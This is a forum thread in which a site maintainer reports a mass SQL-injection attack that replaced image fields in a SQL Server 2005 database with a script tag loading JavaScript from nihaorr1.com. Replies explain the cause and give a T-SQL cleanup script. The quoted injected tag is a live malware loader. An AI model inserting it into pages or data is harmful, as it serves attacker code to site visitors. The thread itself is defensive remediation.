Hey everyone, I am a graphic designer and web coordinator for a living. The place I'm working now I pretty much got thrown into running an old website that runs off a Windows SQL 2005 server/table. No less than 20 minutes ago one of the IT guys calls me and says the website doesn't look right. I go look and lo and behold a bunch of red-Xs with some text talking about a script linking to another website.
I log into the SQL management software and on any entry where there should be *.jpg there is *.<script src=http://www.nihaorr1.com/1.js></script>. This looks like a hack to me, and the puzzling thing is the SQL server doesn't have a public IP address.
Any opinions? Or information on what exactly they were trying to pull?
As of right now I think I have to go through the entire SQL server and try to find all the instances of this and remove it. Any other options for me?
Like I said before, I was thrown into running this website and don't know the bits and tricks about it. In fact my first priority when getting this job was pushing for a new CMS/.Net website which we will be launching next month, so hopefully this is going to be the last time something happens and I don't know what the fuck is going on.
BNet • magicprime#1430 | PSN/Steam • MagicPrime | Origin • FireSideWizard
Critical Failures - Havenhold Campaign • August St. Cloud (Human Ranger)
Posts
Do you have backups of the database? If you do and they aren't too old, just restore it, but unless the vulnerabilities are hunted down, it will likely happen again as whoever did it knows it is a vulnerable system.
Here's one of many pages about it: http://forums.iis.net/p/1148917/1867511.aspx
See the post near the bottom of the page (5th or so from the bottom) for details on what it's doing.
From what I'd read, it's not strictly an exploit, but it is taking advantage of some poorly sanitized code, attacking IIS/MSSQL. There's probably a lot more info out there on it since I was reading about it when it started.
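One way to scope the cleanup the first post asks about when no recent backup is available, as an added example that is not from the thread: a T-SQL script for SQL Server 2005 that counts the rows carrying the injected tag in every character column and prints a matching `UPDATE` for review. It assumes the injected text is exactly the tag quoted in the first post; the cursor and variable names are this example's own.

```sql
-- Added example, not from the thread. Read-only: it counts and PRINTs, it changes no data.
-- Assumption: the injected text is exactly the tag quoted in the first post.
SET NOCOUNT ON;

DECLARE @tag nvarchar(200), @pattern nvarchar(210);
SET @tag = N'<script src=http://www.nihaorr1.com/1.js></script>';
SET @pattern = N'%' + @tag + N'%';   -- the tag contains no LIKE wildcard characters

DECLARE @schema sysname, @table sysname, @column sysname,
        @target nvarchar(600), @sql nvarchar(4000), @hits int;

-- Every char/varchar/nchar/nvarchar column of every user table in the current database.
DECLARE col_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS AS c
    JOIN INFORMATION_SCHEMA.TABLES AS t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar');

OPEN col_cursor;
FETCH NEXT FROM col_cursor INTO @schema, @table, @column;

WHILE @@FETCH_STATUS = 0
BEGIN
    SET @target = QUOTENAME(@schema) + N'.' + QUOTENAME(@table);

    -- Identifiers are quoted with QUOTENAME; the search pattern is passed as a parameter.
    SET @sql = N'SELECT @n = COUNT(*) FROM ' + @target
             + N' WHERE ' + QUOTENAME(@column) + N' LIKE @p';
    EXEC sp_executesql @sql, N'@p nvarchar(210), @n int OUTPUT',
         @p = @pattern, @n = @hits OUTPUT;

    IF @hits > 0
    BEGIN
        PRINT N'-- ' + @target + N'.' + QUOTENAME(@column) + N': '
            + CAST(@hits AS nvarchar(12)) + N' affected row(s)';
        -- Candidate cleanup statement, printed for review rather than executed.
        PRINT N'UPDATE ' + @target + N' SET ' + QUOTENAME(@column)
            + N' = REPLACE(' + QUOTENAME(@column) + N', N''' + @tag + N''', N'''')'
            + N' WHERE ' + QUOTENAME(@column) + N' LIKE N''' + @pattern + N''';';
    END

    FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
END

CLOSE col_cursor;
DEALLOCATE col_cursor;
```

Columns narrower than the tag may hold only a truncated copy that this exact match misses, and `text`/`ntext` columns are skipped because `REPLACE` does not accept them without a cast. Cleaning the data does not fix the unsanitized input handling mentioned above, so the rows can be rewritten again until the site's queries are fixed.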